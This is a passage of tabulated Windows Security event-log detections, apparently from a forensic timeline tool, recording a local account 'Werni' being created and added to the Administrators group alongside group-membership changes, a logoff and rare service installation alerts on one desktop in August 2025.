&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-14 16:29:49 &#9474; &#8227; A Member Was Removed              &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4729     &#9474; 1087      &#9474; DESKTOP-8IRBDLK &#9474; MemberName: '-'                  &#9474;
&#9474;                     &#9474; From a Security-Enabled             &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; MemberSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474; Global Group                        &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-1001       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; PrivilegeList: '-'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: DESKTOP-8IR   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; BDLK                             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-5-21-38715   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 82759-1638593395-315824688-500   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: None             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-513        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x9a5d2'        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: Administrator   &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-14 16:38:49 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4647     &#9474; 1572      &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x9a5d2'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-15 21:04:43 &#9474; &#8227; Rare Service Installations        &#9474; 1     &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474;                                  &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-15 21:10:59 &#9474; &#8227; A Member Was Added to             &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4728     &#9474; 1849      &#9474; DESKTOP-8IRBDLK &#9474; MemberName: '-'                  &#9474;
&#9474;                     &#9474; a Security-Enabled Global           &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; MemberSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474; Group                               &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-1002       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; PrivilegeList: '-'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: DESKTOP-8IR   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; BDLK                             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-5-21-38715   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 82759-1638593395-315824688-500   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: None             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-513        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x725da'        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: Administrator   &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-15 21:10:59 &#9474; &#8227; Local User Creation               &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4720     &#9474; 1850      &#9474; DESKTOP-8IRBDLK &#9474; UserWorkstations: '%%1793'       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; PrivilegeList: '-'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; OldUacValue: '0x0'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; NewUacValue: '0x15'              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; UserPrincipalName: '-'           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonHours: '%%1797'             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ScriptPath: '%%1793'             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; PasswordLastSet: '%%1794'        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; UserParameters: '%%1793'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x725da'        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ProfilePath: '%%1793'            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; AllowedToDelegateTo: '-'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: DESKTOP-8IR   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; BDLK                             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; HomePath: '%%1793'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; AccountExpires: '%%1794'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-5-21-38715   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 82759-1638593395-315824688-500   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DisplayName: '%%1793'            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; HomeDirectory: '%%1793'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; UserAccountControl: "\r\n\t\t%   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; %2080\r\n\t\t%%2082\r\n\t\t%%2   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 084"                             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SidHistory: '-'                  &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-1002       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SamAccountName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: Administrator   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; PrimaryGroupId: '513'            &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-15 21:11:59 &#9474; &#8227; User Added to Local Administrator &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4732     &#9474; 1855      &#9474; DESKTOP-8IRBDLK &#9474; MemberName: '-'                  &#9474;
&#9474;                     &#9474; Group                               &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; MemberSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-1002       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; PrivilegeList: '-'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: DESKTOP-8IR   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; BDLK                             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Builtin        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-5-21-38715   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 82759-1638593395-315824688-500   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: Administrators   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetSid: S-1-5-32-544          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x725da'        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: Administrator   &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-15 21:15:09 &#9474; &#8227; Rare Service Installations        &#9474; 1     &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474;                                  &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-15 21:15:10 &#9474; &#8227; Rare Service Installations        &#9474; 1     &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474;                                  &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-15 21:20:10 &#9474; &#8227; A Member Was Removed              &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4729     &#9474; 1883      &#9474; DESKTOP-8IRBDLK &#9474; MemberName: '-'                  &#9474;
&#9474;                     &#9474; From a Security-Enabled             &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; MemberSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474; Global Group                        &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-1000       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; PrivilegeList: '-'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: DESKTOP-8IR   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; BDLK                             &#9474;
